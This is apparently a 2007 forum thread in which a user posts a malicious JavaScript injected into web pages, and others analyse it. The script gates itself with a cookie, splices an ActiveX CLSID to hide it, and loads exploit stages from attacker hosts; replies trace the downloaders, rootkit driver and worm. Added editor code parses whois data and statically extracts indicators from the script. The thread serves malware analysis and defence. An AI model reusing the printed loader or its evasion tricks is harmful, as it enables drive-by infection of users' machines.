21-11-2007, 07:30 AM   #1
Sunry
Got injected web script while browsing any website (what's the virus?)

What virus it could be?

While I browse any web page, I find some unusual stuff in the HTML source:
<SCRIPT LANGUAGE="javascript1.2" SRC="http://ads.goodnetads.org/main.js"></SCRIPT>

From whois, the domain name was just created recently:
-------------------------------------------------------------------------------------
Domain ID:149809477-LROR
Domain Name:GOODNETADS.ORG
Created On:15-Nov-2007 07:11:35 UTC
Last Updated On:15-Nov-2007 07:11:37 UTC
Expiration Date:15-Nov-2008 07:11:35 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:BE872B07E523EDFE
Registrant Name:wang ming
Registrant Organization:wang ming
Registrant Street1:cccccccc
Registrant Street2:
Registrant Street3:
Registrant City:ccccc
Registrant State/Province:Xizang
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+10.2312312312
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:web@goodnetads.org
Admin ID:BE872B07E523EDFE
Admin Name:wang ming
Admin Organization:wang ming
Admin Street1:cccccccc
Admin Street2:
Admin Street3:
Admin City:ccccc
Admin State/Province:Xizang
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+10.2312312312
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:web@goodnetads.org
Tech ID:BE872B07E523EDFE
Tech Name:wang ming
Tech Organization:wang ming
Tech Street1:cccccccc
Tech Street2:
Tech Street3:
Tech City:ccccc
Tech State/Province:Xizang
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+10.2312312312
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:web@goodnetads.org
Name Server:NS1.NAME-SERVICES.COM
Name Server:NS2.NAME-SERVICES.COM
Name Server:NS3.NAME-SERVICES.COM
Name Server:NS4.NAME-SERVICES.COM
Name Server:NS5.NAME-SERVICES.COM
-------------------------------------------------------------------------------------


and the script code is:
-------------------------------------------------------------------------------------
window.status = "";
// Fires at most once a day per victim: a marker cookie gates the whole payload.
var cookieString = document.cookie;
var start = cookieString.indexOf("Lovemm=");
if (start != -1)
{}
else
{
    var expires = new Date();
    expires.setTime(expires.getTime() + 24 * 1 * 60 * 60 * 1000);
    document.cookie = "Lovemm=funnyfunny;expires=" + expires.toGMTString();
    try {
        // The CLSID is spliced from fragments so it never appears whole in the source.
        var downf = document.createElement("object");
        downf.setAttribute("classid",
            "clsid:B"+"D9"+"6C"+"556-6"+"5A3-11D"+"0-98"+"3A-00C"+"04FC2"+"9E"+"36");
        str = "Microsoft.XMLHTTP";
        var ab = ab;
        var O = downf.CreateObject(str, "");
        // If the control could be instantiated, pull in the first-stage loader.
        document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
        document.write(' SRC="http://ads.1234214.info/tk.js"></SCR' + 'IPT>');
    }
    catch (e) {
        // Otherwise fall back to a second script and a remote cursor file.
        document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
        document.write(' SRC="http://down.goodnetads.org/tk/xl.js"></SCR' + 'IPT>');
        document.write("<DIV style=\"CURSOR: url('http://ads.1234214.info/tk/ani.c')\"></DIV>");
    };
}
-------------------------------------------------------------------------------------

Obviously it's some kind of ads virus. The virus might not be on my box;
I checked. And there's no ARP spoofing.
I also checked other computers on the same LAN; they have the
same problem as me.
I handled it with hosts files that direct it to myself.

How could this kind of virus get to work this way?
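The whois check Sunry did by eye can be made mechanical. What follows is an added example (editor's code, not from the thread) that parses a registrar whois dump of this shape and flags a domain created only days before it was first seen, together with contact fields that are obviously filler. The input is the whois text from the post, trimmed to the registrant contact and with the colon restored on the "Domain ID" and "Name Server" lines that the forum extraction dropped; the observation time is the post's timestamp (07:30 AM in the forum's GMT +5.5, i.e. 02:00 UTC on 21 Nov 2007), and the 30-day threshold is an assumed cutoff.

```javascript
// Added example (editor's code, not from the thread). Parses a registrar whois
// dump of the kind Sunry pasted and flags what a responder checks first: a
// domain created days before it turned up in injected script, and contact
// fields that are one repeated character. SAMPLE_WHOIS is the post's whois
// text, trimmed to the registrant contact (constructed input for this example).
const SAMPLE_WHOIS = `Domain ID:149809477-LROR
Domain Name:GOODNETADS.ORG
Created On:15-Nov-2007 07:11:35 UTC
Last Updated On:15-Nov-2007 07:11:37 UTC
Expiration Date:15-Nov-2008 07:11:35 UTC
Sponsoring Registrar:eNom, Inc. (R39-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant Name:wang ming
Registrant Organization:wang ming
Registrant Street1:cccccccc
Registrant City:ccccc
Registrant State/Province:Xizang
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+10.2312312312
Registrant Email:web@goodnetads.org
Name Server:NS1.NAME-SERVICES.COM
Name Server:NS2.NAME-SERVICES.COM`;

// When the script was seen: the post's timestamp, 07:30 in the forum's GMT+5.5,
// which is 02:00 UTC on 21 Nov 2007.
const OBSERVED_AT = new Date(Date.UTC(2007, 10, 21, 2, 0, 0));

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5,
                 Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// "15-Nov-2007 07:11:35 UTC" -> Date; null for anything not of that shape.
function parseWhoisDate(s) {
  const m = /^(\d{2})-([A-Z][a-z]{2})-(\d{4}) (\d{2}):(\d{2}):(\d{2}) UTC$/.exec((s || "").trim());
  if (!m || !(m[2] in MONTHS)) return null;
  return new Date(Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]));
}

// "Key:Value" lines -> [key, value] pairs in file order. Repeated keys such as
// Status and Name Server are kept; lines without a colon are skipped.
function parseWhois(text) {
  const fields = [];
  for (const line of text.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i <= 0) continue;
    fields.push([line.slice(0, i).trim(), line.slice(i + 1).trim()]);
  }
  return fields;
}

function first(fields, key) {
  const hit = fields.find(([k]) => k === key);
  return hit ? hit[1] : null;
}

// Whole days from "Created On" to the observation time; null if unparseable.
function domainAgeDays(fields, observedAt) {
  const created = parseWhoisDate(first(fields, "Created On"));
  return created ? Math.floor((observedAt - created) / 86400000) : null;
}

// Values that are a single character repeated four or more times
// ("cccccccc", "ccccc"): the registrant typed filler to get past the form.
function placeholderFields(fields) {
  return fields.filter(([, v]) => /^(.)\1{3,}$/.test(v)).map(([k]) => k);
}

// maxAgeDays is an assumed cutoff; tune it to what the site normally sees.
function assessDomain(text, observedAt, maxAgeDays = 30) {
  const fields = parseWhois(text);
  const ageDays = domainAgeDays(fields, observedAt);
  const placeholders = placeholderFields(fields);
  const reasons = [];
  if (ageDays !== null && ageDays < maxAgeDays) {
    reasons.push(`registered ${ageDays} day(s) before it was seen`);
  }
  if (placeholders.length > 0) {
    reasons.push(`placeholder contact data in: ${placeholders.join(", ")}`);
  }
  return { domain: first(fields, "Domain Name"), ageDays, placeholders, reasons,
           suspicious: reasons.length > 0 };
}

console.log(JSON.stringify(assessDomain(SAMPLE_WHOIS, OBSERVED_AT), null, 2));
```

On the full dump the Admin and Tech blocks carry the same cccccccc/ccccc values, so the placeholder count there is six rather than the two the trimmed sample yields; the age comes out at five whole days either way.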
22-11-2007, 08:29 AM   #2
Ant

"Sunry" wrote:

> While I browse any web page, I find some unusual stuff in the HTML
> source:


> ads.goodnetads.org/main.js


loads:

> ads.1234214.info/tk.js


which will attempt to download and run "info.jpg.exe".

main.js also loads:

> down.goodnetads.org/tk/xl.js


which looks like a malformed FlvPlayerUrl (Flash video?) exploit using
a buffer overflow to inject code. It's not obvious what the code does.

main.js also loads:

> ads.1234214.info/tk/ani.c


which is an animated cursor exploit to download and run "info.exe".
This file is identical to "info.jpg.exe".

> Obviously it's some kind of ads virus, the virus might not on my box,
> I checked. And there's no arp spoofing.


It's nasty malware incorporating root-kit techniques. It will hide or
protect its files. The downloader (info.exe or info.jpg.exe) performs
the following actions:

* creates <windows>\system32\drivers\uuid.sys
* calls ZwSetSystemInformation to load uuid.sys into kernel space
* deletes uuid.sys
* downloads and runs "ads.1234214.info/tk/web.jpg", another executable
as <user>\Local Settings\Temp\update.exe
* deletes the original downloader.

I haven't analysed what update.exe (web.jpg) does but it's detected by
Bitdefender as Win32.Almanahe.E. A quick inspection of the binary
shows it to be similar to what they describe here in the 'D' variant:
http://www.bitdefender.com/VIRUS-100...lmanahe.D.html

> I also checked other computers in the same LAN, they also have the
> same problem with me.
> I handled it with hosts files that direct it to myself.


You'd better check what other sites your network is connecting to.

> How could this kind of virus get to work like this way?


Malicious Javascript taking advantage of unpatched vulnerabilities in
Windows and other components. You need to increase your browser and
system security, and certainly should not allow ActiveX controls and
plugins to run on untrusted sites such as these.


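The three loads Ant lists (tk.js, xl.js, ani.c) and the spliced CLSID can be recovered from main.js mechanically, without running it. The following is an added example (editor's code, not from the thread or the malware): a small static triage that folds the "a"+"b" string concatenation Sunry's script uses, then lists the CLSIDs, URLs, cookie gate and document.write'd tags. The sample is the script from the first post with its one line-wrapped URL rejoined. The CLSID-to-name table is my own one-entry lookup, not something the thread states: BD96C556-65A3-11D0-983A-00C04FC29E36 is RDS.DataSpace, the control patched in MS06-014.

```javascript
// Added example (editor's code, not from the thread or the malware). Static
// triage of the injected main.js: fold the "a"+"b" string splicing that hides
// the CLSID and the <SCRIPT> tags, then list what the folded script references.
// SAMPLE_JS is the script Sunry posted, embedded as input with its one
// line-wrapped URL rejoined.
const SAMPLE_JS = String.raw`
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("Lovemm=");
if (start != -1) {} else {
var expires = new Date();
expires.setTime(expires.getTime() + 24 * 1 * 60 * 60 * 1000);
document.cookie = "Lovemm=funnyfunny;expires=" + expires.toGMTString();
try{
var downf = document.createElement("object");
downf.setAttribute("classid",
"clsid:B"+"D9"+"6C"+"556-6"+"5A3-11D"+"0-98"+"3A-00C"+"04FC2"+"9E"+"36");
str="Microsoft.XMLHTTP";
var ab=ab;
var O = downf.CreateObject(str,"");
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://ads.1234214.info/tk.js"></SCR' + 'IPT>');
}
catch(e)
{
document.write('<SCRI' + 'PT LANGUAGE="javascript1.2"');
document.write(' SRC="http://down.goodnetads.org/tk/xl.js"></SCR' + 'IPT>');
document.write("<DIV style=\"CURSOR: url('http://ads.1234214.info/tk/ani.c')\"></DIV>");
};
}`;

// One string literal, either quote style, no raw newlines inside.
const STR = /"(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*'/g;
// Two literals joined by "+": the splice the sample uses on the CLSID and tags.
const PAIR = /("(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*')\s*\+\s*("(?:[^"\\\n]|\\.)*"|'(?:[^'\\\n]|\\.)*')/;

const ESCAPES = { n: "\n", r: "\r", t: "\t" };

// Strip the quotes from a literal and resolve the simple escapes it may contain.
function unquote(lit) {
  let out = "";
  for (let i = 1; i < lit.length - 1; i++) {
    const c = lit[i];
    if (c === "\\" && i + 1 < lit.length - 1) {
      const e = lit[++i];
      out += e in ESCAPES ? ESCAPES[e] : e;
    } else {
      out += c;
    }
  }
  return out;
}

// Repeatedly merge "a"+"b" into "ab" until no adjacent literal pair is left.
function foldStrings(src) {
  let prev;
  do {
    prev = src;
    src = src.replace(PAIR, (_, a, b) => JSON.stringify(unquote(a) + unquote(b)));
  } while (src !== prev);
  return src;
}

// CLSIDs a triager recognises on sight; my own one-entry lookup, not from the thread.
const KNOWN_CLSIDS = {
  "BD96C556-65A3-11D0-983A-00C04FC29E36": "RDS.DataSpace (MS06-014)",
};

function addUnique(list, v) { if (!list.includes(v)) list.push(v); }

// Report the indicators a responder wants before touching the next stage.
function triageScript(src) {
  const folded = foldStrings(src);
  const literals = (folded.match(STR) || []).map(unquote);
  const clsids = [], urls = [];
  for (const s of literals) {
    for (const m of s.matchAll(/clsid:([0-9a-f-]{36})/gi)) addUnique(clsids, m[1].toUpperCase());
    for (const m of s.matchAll(/https?:\/\/[^\s"'<>)]+/g)) addUnique(urls, m[0]);
  }
  const gate = /\.indexOf\(["']([^"'=]+)=/.exec(folded);
  return {
    clsids: clsids.map(id => ({ id, known: KNOWN_CLSIDS[id] || null })),
    urls,
    cookieGate: gate ? gate[1] : null,   // marker cookie that makes this fire once per victim
    writesScriptTag: literals.some(s => /<script\b/i.test(s)),
    remoteCursor: literals.some(s => /cursor:\s*url\(/i.test(s)),
  };
}

console.log(JSON.stringify(triageScript(SAMPLE_JS), null, 2));
```

The folding handles only literal-plus-literal splicing, which is all this sample uses; scripts that build strings with String.fromCharCode, unescape or array joins need the same idea applied to those constructs, or a sandboxed run with document.write hooked.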
22-11-2007, 09:31 AM   #3
Virus Guy

Ant wrote:

> main.js also loads:
>
> > ads.1234214.info/tk/ani.c

>
> which is an animated cursor exploit to download and run
> "info.exe".


info.exe makes references to:

\system32\drivers\uuid.sys and UNIS.bat

Absolutely no search hits for uuid.sys.

info.exe was already analyzed by VT, with a 78% detection rate:

http://www.virustotal.com/resultado....a2edd0076c312b

Microsoft being the only notable AV program to NOT detect it.

ani.c has an 84% detection rate.

The file tk.js is flagged only by 6 out of 32 AV programs as a JS
trojan downloader (bdx, hi, ha or ldc).

> I haven't analysed what update.exe (web.jpg) does but it's
> detected by Bitdefender as Win32.Almanahe.E.


It's also detected as Alman.a by most AV.

According to this:

http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml

it spreads via network connectivity, and also infects all executable
files on a system (so there should be lots of hard-drive activity I
would think).

It seems to be categorized as a network worm and trojan, not as a
rootkit - but perhaps it eventually downloads and installs a rootkit
as a second stage of the infection.

> > I also checked other computers in the same LAN, they also
> > have the same problem with me. I handled it with hosts
> > files that direct it to myself.


Read the above f-secure link. It contains advice and links to
disinfection tools.

> > How could this kind of virus get to work like this way?


There is some aspect of your system that wasn't patched. If you're
sure that it's up to date (as far as Microsoft is concerned) then your
Java JRE should be looked at. You need to uninstall ALL versions of
Java Runtime Engines (JRE) and only install the latest version.

It's a widely known flaw that simply having an old version of JRE
still installed on your system is a vulnerability. Installing new
versions of JRE does not get rid of older versions.

Have you "inoculated" your browsers with Spybot SD and Spyware
Blaster?
23-11-2007, 07:30 AM   #4
Ant

"Virus Guy" wrote:

> Absolutely no search hits for uuid.sys.


Not surprising because that is deleted immediately after being dropped
and loaded into memory. It's the initial rootkit component and is
likely not needed once the second binary is downloaded and installed.

> http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml


That's an older version which behaves in a similar way. The
Bitdefender example is a closer description and has the correct URL
which the malware uses for further communication.

> It seems to be catagorized as a network worm and trojan, not as a
> rootkit - but perhaps it eventually downloads and installs a rootkit
> as a second stage of the infection.


It drops its own version of linkinfo.dll in the %windows% directory;
the genuine MS version being in %windows%\system32. I believe the
rootkit components are embedded in the dll. They appear to be:

IsDrv122.sys
RsBoot.sys
cdralw.sys

One or more will be launched from the registry entry:
HKLM\SYSTEM\CurrentControlSet\Services
with the service name DLANX.

These files are also created:

C:\setup.exe
\\.\DLUProc

Mutex names appear to be:

__DLU_INF__
PNP#DMUTEX#1#DLU
PNP#NETMUTEX#1#DLU

> There is some aspect of your system that wasn't patched.


I reckon ActiveX, anifile or Macromedia Flash.

> If you're sure that it's up to date (as far as Microsoft is
> concerned) then your Java JRE should be looked at.


In this case, Java wasn't involved.


23-11-2007, 09:31 PM   #5
jen

"Ant" <not@home.today> wrote in message
news:96CdndrY9NJZstvaRVnyggA@brightview.co.uk...

I so enjoy your analyses of malware

-jen


24-11-2007, 04:30 AM   #6
Ant

"jen" wrote:

> I so enjoy your analyses of malware


Well, I like pulling them apart but it's nice to know someone is
interested in seeing the results!


24-11-2007, 05:30 AM   #7
Dustin Cook

"Ant" <not@home.today> wrote in
news:fJWdna9mFI8GxdranZ2dnUVZ8vidnZ2d@brightview.co.uk:

> "jen" wrote:
>
>> I so enjoy your analyses of malware
>
> Well, I like pulling them apart but it's nice to know someone is
> interested in seeing the results!

Several of us are evidently.


--
Dustin Cook, Author of BugHunter - MalWare Removal Tool - v2.2d
Email.: bughunter.dustin@gmail.com
Web...: http://bughunter.it-mate.co.uk
Pad...: http://bughunter.it-mate.co.uk/pad.xml
PGP...: http://bughunter.it-mate.co.uk/bughunter.dustin.txt
24-11-2007, 10:29 AM   #8
kurt wismer

Virus Guy wrote:
[snip]
> According to this:
>
> http://www.f-secure.com/v-descs/virus_w32_alman_a.shtml
>
> it spreads via network connectivity, and also infects all executable
> files on a system (so there should be lots of hard-drive activity I
> would think).
>
> It seems to be catagorized as a network worm and trojan, not as a
> rootkit - but perhaps it eventually downloads and installs a rootkit
> as a second stage of the infection.


or perhaps 'rootkit' functionality is merely a *property* of other
malware... i think it only gets used as a primary classification when
the malware's other functionality isn't particularly significant by
comparison or if there isn't any other functionality to begin with...

--
"it's not the right time to be sober
now the idiots have taken over
spreading like a social cancer,
is there an answer?"
03-12-2007, 12:20 AM   #9
Buffalo

"Ant" <not@home.today> wrote in message
news:fJWdna9mFI8GxdranZ2dnUVZ8vidnZ2d@brightview.co.uk...
> "jen" wrote:
>
> > I so enjoy your analyses of malware
>
> Well, I like pulling them apart but it's nice to know someone is
> interested in seeing the results!

Me too.


All times are GMT +5.5.